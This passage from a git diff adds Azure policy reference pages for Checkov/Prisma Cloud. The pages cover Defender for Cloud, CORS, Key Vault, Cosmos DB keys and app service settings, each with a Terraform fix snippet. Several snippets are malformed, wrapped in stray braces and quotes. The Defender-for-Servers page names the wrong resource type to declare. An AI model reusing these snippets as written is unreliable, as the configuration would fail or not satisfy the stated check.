fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender detects unusual and potentially harmful attempts to access or exploit Key Vault accounts. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `KeyVaults` is declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc new file mode 100644 index 000000000..180ce581c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc @@ -0,0 +1,56 @@ +== Azure Security Center Defender set to Off for Kubernetes + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f44b3781-8c35-4166-8772-36e61c5314e6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py[CKV_AZURE_85] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect 
threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for Kubernetes provides cluster-level threat protection by monitoring your AKS-managed services through the logs retrieved by Azure Kubernetes Service (AKS). + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `KubernetesService` is declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-servers.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-servers.adoc new file mode 100644 index 000000000..bb9b99c63 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-servers.adoc @@ -0,0 +1,58 @@ +== Azure Microsoft Defender for Cloud is set to Off for Servers +// Azure Microsoft Defender for Cloud disabled for Servers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| eb5f5af1-754d-4f6b-9c08-610a6974db16 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py[CKV_AZURE_55] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes and agent-based 
deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for servers adds threat detection and advanced defenses for Windows and Linux machines. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `SqlServers` is declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc new file mode 100644 index 000000000..3b34eb00e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc @@ -0,0 +1,55 @@ +== Azure Microsoft Defender for Cloud is set to Off for SQL servers on machines + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1f3ae628-17bf-4d0b-b2d1-a0fbb61bf19c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py[CKV_AZURE_79] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that 
utilizes and agent-based deployment to analyze signals from Azure network fabric and the service control plane, to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for SQL servers on machines extends the protections for your Azure-native SQL Servers to fully support hybrid environments and protect SQL servers (all supported version) hosted in Azure. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. +Ensure that `SqlServers` and `SqlServerVirtualMachines` are declared to pass this check. + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-storage.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-storage.adoc new file mode 100644 index 000000000..90b215b4e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-storage.adoc @@ -0,0 +1,58 @@ +== Azure Microsoft Defender for Cloud is set to Off for Storage +// Azure Microsoft Defender for Cloud disabled for Storage + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5436f3cc-3815-44f4-ac09-b8418e1f8e1d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py[CKV_AZURE_84] + +|Severity +|MEDIUM + +|Subtype +|Build 
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Azure Defender is a cloud workload protection service that utilizes an agent-based deployment to analyze signals from the Azure network fabric and the service control plane to detect threats across all Azure resources.
+It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded).
+Azure Defender for Storage detects unusual and potentially harmful attempts to access or exploit storage accounts.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_security_center_subscription_pricing
+* *Arguments:* resource_type - (Required) The resource type this setting affects.
+
+Ensure that `StorageAccounts` is declared to pass this check.
+
+
+[source,go]
+----
+resource "azurerm_security_center_subscription_pricing" "example" {
+  tier          = "Standard"
+  resource_type = "StorageAccounts"
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-app-services.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-app-services.adoc
new file mode 100644
index 000000000..5fed94d12
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-app-services.adoc
@@ -0,0 +1,53 @@
+== CORS allows resource to access app services
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 50ef4f8f-614c-43dc-84bb-f22dbbbd1a8a
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py[CKV_AZURE_57]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Cross-Origin Resource Sharing (CORS) should not allow all domains to access your web application.
+Allow only required domains to interact with your web app.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* site_config.cors
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
+  site_config {
++   cors {
++     allowed_origins = ["192.0.0.1"]
++   }
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc
new file mode 100644
index 000000000..6c65ccc48
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc
@@ -0,0 +1,58 @@
+== CORS allows resources to access function apps
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1c775345-9c89-47fb-880f-f2a0c3be6f21
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py[CKV_AZURE_62]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Cross-Origin Resource Sharing (CORS) should not allow all domains to access your Function app.
+Allow only required domains to interact with your Function app.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_function_app
+* *Arguments:* site_config.cors
+
+
+[source,go]
+----
+resource "azurerm_function_app" "example" {
+  ...
+  site_config {
++   cors {
++     allowed_origins = ["192.0.0.1"]
++   }
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc
new file mode 100644
index 000000000..c10562176
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc
@@ -0,0 +1,95 @@
+== Cosmos DB Accounts do not have CMKs encrypting data at rest
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 51ba0997-2c15-4113-a1e9-81500b84e4fb
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py[CKV_AZURE_100]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Data stored in an Azure Cosmos account is automatically encrypted with keys managed by Microsoft (service-managed keys).
+Customer-managed keys (CMKs) give users total control over the keys used by Azure Cosmos DB to encrypt their data at rest.
+Built as an additional encryption layer on top of the Azure Cosmos DB default encryption at rest with service-managed keys, it uses Azure Key Vault to store encryption keys and provides a way to implement double encryption.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_cosmosdb_account
+* *Arguments:* key_vault_key_id - (Optional) A versionless Key Vault Key ID for CMK encryption.
+
+Changing this forces a new resource to be created.
+
+
+[source,go]
+----
+resource "azurerm_cosmosdb_account" "db" {
+  name                = "tfex-cosmos-db-${random_integer.ri.result}"
+  location            = azurerm_resource_group.rg.location
+  resource_group_name = azurerm_resource_group.rg.name
+  offer_type          = "Standard"
+  kind                = "GlobalDocumentDB"
+  key_vault_key_id    = azurerm_key_vault_key.example.versionless_id
+
+  enable_automatic_failover = true
+
+  capabilities {
+    name = "EnableAggregationPipeline"
+  }
+
+  capabilities {
+    name = "mongoEnableDocLevelTTL"
+  }
+
+  capabilities {
+    name = "MongoDBv3.4"
+  }
+
+  consistency_policy {
+    consistency_level       = "BoundedStaleness"
+    max_interval_in_seconds = 10
+    max_staleness_prefix    = 200
+  }
+
+  geo_location {
+    location          = var.failover_location
+    failover_priority = 1
+  }
+
+  geo_location {
+    location          = azurerm_resource_group.rg.location
+    failover_priority = 0
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-data-lake-store-accounts-enables-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-data-lake-store-accounts-enables-encryption.adoc
new file mode 100644
index 000000000..c7b17e6c0
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-data-lake-store-accounts-enables-encryption.adoc
@@ -0,0 +1,62 @@
+== Unencrypted Data Lake Store accounts
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 02889fff-fde0-4b22-b63c-08d49724af32
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py[CKV_AZURE_105]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Azure Data Lake Storage Gen2 is a set of capabilities dedicated to big data analytics, built on Azure Blob storage.
+Data Lake Storage Gen2 converges the capabilities of Azure Data Lake Storage Gen1 with Azure Blob storage.
+Data Lake Storage Gen1 supports encryption of data both at rest and in transit.
+For data at rest, Data Lake Storage Gen1 supports "on by default," transparent encryption.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_data_lake_store
+* *Arguments:* encryption_state - (Optional) Is Encryption enabled on this Data Lake Store Account?
+
+Possible values are Enabled or Disabled.
+Defaults to Enabled.
+encryption_type - (Optional) The Encryption Type used for this Data Lake Store Account.
+Currently can be set to ServiceManaged when encryption_state is Enabled - and must be a blank string when it's Disabled.
+
+
+[source,go]
+----
+resource "azurerm_data_lake_store" "example" {
+  ...
+  encryption_state = "Enabled"
+  encryption_type  = "ServiceManaged"
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-function-apps-enables-authentication.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-function-apps-enables-authentication.adoc
new file mode 100644
index 000000000..943b34c75
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-function-apps-enables-authentication.adoc
@@ -0,0 +1,56 @@
+== Azure Function App authentication is off
+// Azure Function App authentication disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 90dc2872-7c50-4a57-a2af-4fc6fea535c5
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py[CKV_AZURE_56]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Azure App Service Authentication is a feature that can prevent anonymous HTTP requests from reaching the Function app, or authenticate those that have tokens before they reach the Function app.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_function_app
+* *Arguments:* auth_settings.enabled
+
+
+[source,go]
+----
+resource "azurerm_function_app" "example" {
+  ...
++ auth_settings {
++   enabled = true
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc
new file mode 100644
index 000000000..132dd1736
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc
@@ -0,0 +1,95 @@
+== Azure Function App doesn't use HTTP 2.0
+// Azure Function App does not use HTTP 2.0
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6865e87f-5045-4319-bc32-b659bde8e3a2
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py[CKV_AZURE_67]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies Azure Function Apps that do not use HTTP 2.0.
+HTTP 2.0 includes performance improvements that address the head-of-line blocking problem of the old HTTP version, along with header compression and prioritization of requests.
+HTTP 2.0 no longer supports HTTP 1.1's chunked transfer encoding mechanism, as it provides its own, more efficient, mechanisms for data streaming.
+
+////
+=== Fix - Runtime
+
+
+*In Azure Console*
+
+
+
+. Log in to the Azure portal.
+
+. Navigate to Function App.
+
+. Click on the reported Function App.
+
+. Under the Settings section, click 'Configuration'.
+
+. Under the 'General Settings' tab, in 'Platform settings', set 'HTTP version' to '2.0'.
+
+. Click 'Save'.
+
+
+*In Azure CLI*
+
+
+If the Function App is hosted on Linux using a Consumption (Serverless) plan, run the following Azure CLI command:
+
+
+[source,text]
+----
+az functionapp config set --http20-enabled true --name MyFunctionApp --resource-group MyResourceGroup
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_function_app
+* *Arguments:* site_config.http2_enabled
+
+
+[source,go]
+----
+resource "azurerm_function_app" "example" {
+  ...
++ site_config {
++   http2_enabled = true
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc
new file mode 100644
index 000000000..31bd11de0
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc
@@ -0,0 +1,59 @@
+== Azure App Service Web app does not use latest Java version
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 5aebd2ef-e2d2-4b3a-8d35-70e1d2b4de79
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py[CKV_AZURE_83]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Azure App Service web applications developed with the Java software stack should use the latest available version of Java to ensure the latest security fixes are in use.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* java_version - (Optional) The version of Java to use.
+
+If specified, java_container and java_container_version must also be specified.
+Possible values are 1.7, 1.8, and 11, and their specific versions, except for Java 11 (e.g., 1.7.0_80, 1.8.0_181, 11).
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
+  site_config {
++   java_version = "11"
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-purge-protection.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-purge-protection.adoc
new file mode 100644
index 000000000..b238d96e1
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-purge-protection.adoc
@@ -0,0 +1,59 @@
+== Azure Key Vault Purge protection is not enabled
+// Azure Key Vault Purge protection disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 5238e9c3-3e2e-4d94-b492-261eedc01a2e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py[CKV_AZURE_110]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Purge protection is an optional Key Vault behavior and is not enabled by default.
+Purge protection can only be enabled once soft-delete is enabled.
+It can be turned on via CLI or PowerShell.
+When purge protection is on, a vault or an object in the deleted state cannot be purged until the retention period has passed.
+Soft-deleted vaults and objects can still be recovered, ensuring that the retention policy will be followed.
+The default retention period is 90 days, but it is possible to set the retention policy interval to a value from 7 to 90 days through the Azure portal.
+Once the retention policy interval is set and saved, it cannot be changed for that vault.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_key_vault
+* *Arguments:* purge_protection_enabled - (Optional) Is Purge Protection enabled for this Key Vault?
+
+Defaults to false.
+
+
+[source,go]
+----
+resource "azurerm_key_vault" "example" {
+  ...
++ purge_protection_enabled = true
+}
+----
\ No newline at end of file
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-soft-delete.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-soft-delete.adoc
new file mode 100644
index 000000000..c0a093826
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-soft-delete.adoc
@@ -0,0 +1,57 @@
+== Key vault does not enable soft-delete
+// Key Vault does not enable soft-delete
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 01fb7eb5-26d1-4cfa-8c8e-eae7d5fa5683
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py[CKV_AZURE_111]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Deleting a key vault without soft delete enabled permanently deletes all secrets, keys, and certificates stored in the key vault.
+Accidental deletion of a key vault can lead to permanent data loss.
+Soft delete allows you to recover an accidentally deleted key vault for a configurable retention period.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_key_vault
+* *Arguments:* soft_delete_retention_days - (Optional) The number of days that items should be retained for once soft-deleted.
+
+This value can be between 7 and 90 (the default) days.
+
+
+[source,go]
+----
+resource "azurerm_key_vault" "example" {
+  ...
++ soft_delete_retention_days = 7
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-key-is-backed-by-hsm.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-key-is-backed-by-hsm.adoc
new file mode 100644
index 000000000..1d6356f38
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-key-is-backed-by-hsm.adoc
@@ -0,0 +1,62 @@
+== Key vault key is not backed by HSM
+// Azure Key Vault key not backed by HSM
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 13e037b0-68b4-4cac-aca6-4df4c9f98192
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py[CKV_AZURE_112]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+For added assurance, when you use Azure Key Vault, you can import or generate keys in hardware security modules (HSMs) that never leave the HSM boundary.
+This scenario is often referred to as bring your own key, or BYOK.
+Azure Key Vault uses the nCipher nShield family of HSMs (FIPS 140-2 Level 2 validated) to protect your keys.
+You should be aware of the cost implications of using an HSM and whether this fits in with your security posture.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_key_vault_key
+* *Arguments:* key_type - (Required) Specifies the Key Type to use for this Key Vault Key.
+
+Possible values are EC (Elliptic Curve), EC-HSM, Oct (Octet), RSA and RSA-HSM.
+Changing this forces a new resource to be created.
+
+
+[source,go]
+----
+resource "azurerm_key_vault_key" "generated" {
+  ...
++ key_type = "RSA-HSM"
+  ...
+}
+----
+
+Select an option with "-HSM" to pass this check.
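+For context, a fuller declaration might look like the following sketch; the key name, vault reference, key size, and key_opts values are illustrative placeholders, not values required by the check:
+
+[source,go]
+----
+resource "azurerm_key_vault_key" "generated" {
+  # Placeholder name and vault reference for illustration only
+  name         = "generated-key"
+  key_vault_id = azurerm_key_vault.example.id
+
+  # An HSM-backed key type ("RSA-HSM" or "EC-HSM") satisfies this policy
+  key_type = "RSA-HSM"
+  key_size = 2048
+
+  key_opts = [
+    "decrypt",
+    "encrypt",
+    "sign",
+    "unwrapKey",
+    "verify",
+    "wrapKey",
+  ]
+}
+----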
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-secrets-have-content-type-set.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-secrets-have-content-type-set.adoc
new file mode 100644
index 000000000..a37387043
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-secrets-have-content-type-set.adoc
@@ -0,0 +1,61 @@
+== Key vault secrets do not have content_type set
+// Azure Key Vault secrets content_type not set
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| bf534684-b59a-4ce7-b012-430296bb7120
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretContentType.py[CKV_AZURE_114]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Azure Key Vault is a service for secrets management to securely store and control access to tokens, passwords, certificates, API keys, and other secrets.
+A content type tag helps identify whether a secret is a password, connection string, etc.
+Different secrets have different rotation requirements.
+A content type tag should be set on secrets.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_key_vault_secret
+* *Arguments:* content_type - (Optional) Specifies the content type for the Key Vault Secret.
+
+
+[source,go]
+----
+resource "azurerm_key_vault_secret" "example" {
+  name         = "example-secret"
+  value        = "example-value"
+  key_vault_id = azurerm_key_vault.example.id
+
++ content_type = "text/plain"
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc
new file mode 100644
index 000000000..270aa29fb
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc
@@ -0,0 +1,61 @@
+== Managed disks do not use a specific set of disk encryption sets for customer-managed key encryption
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| dd3f21d1-4b56-4a6d-a4ad-58b126d2791b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py[CKV_AZURE_93]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Requiring a specific set of disk encryption sets to be used with managed disks gives you control over the keys used for encryption at rest.
+You can select the allowed encryption sets; all others are rejected when attached to a disk.
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_managed_disk +* *Arguments:* disk_encryption_set_id + + +[source,go] +---- +{ + " resource "azurerm_managed_disk" "source" { + name = "acctestmd1" + location = "West US 2" + resource_group_name = azurerm_resource_group.example.name + storage_account_type = "Standard_LRS" + create_option = "Empty" + disk_size_gb = "1" ++ disk_encryption_set_id = "koko" + tags = { + environment = "staging" + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc new file mode 100644 index 000000000..839cbb6f4 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc @@ -0,0 +1,74 @@ +== Azure App Service Web app does not have a Managed Service Identity + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 21380788-802e-45bb-9927-779c7a3ff255 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py[CKV_AZURE_71] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Managed service identity in App Service makes the app more secure by eliminating secrets from the app, such as credentials in the connection strings. +When registering with Azure Active Directory in the app service, the app will connect to other Azure services securely without the need of username and passwords. + +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Log in to the Azure portal. + +. Navigate to App Services. + +. Click on the reported App. + +. 